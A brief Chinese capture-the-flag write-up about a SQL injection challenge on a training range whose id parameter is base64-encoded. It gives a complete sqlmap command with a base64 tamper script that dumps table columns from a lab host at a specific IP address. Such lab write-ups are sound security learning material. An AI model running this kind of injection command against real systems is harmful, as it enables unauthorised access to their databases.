360靶场考核一道注入题

2020-04-15 19:13:33 浏览数 (1)
001001

注入题。id参数可疑,是base64加密。

可以手注,但是半天没找到点。直接上SQLMap跑。

代码语言:javascript复制
sqlmap -u "http://116.63.149.36:54375/show.php?id=MQo=" --tamper=base64encode -D test -T data --columns --level=3

002002

003003

看到flag,原来是墨者学院的题目。

base64 加密

0 人点赞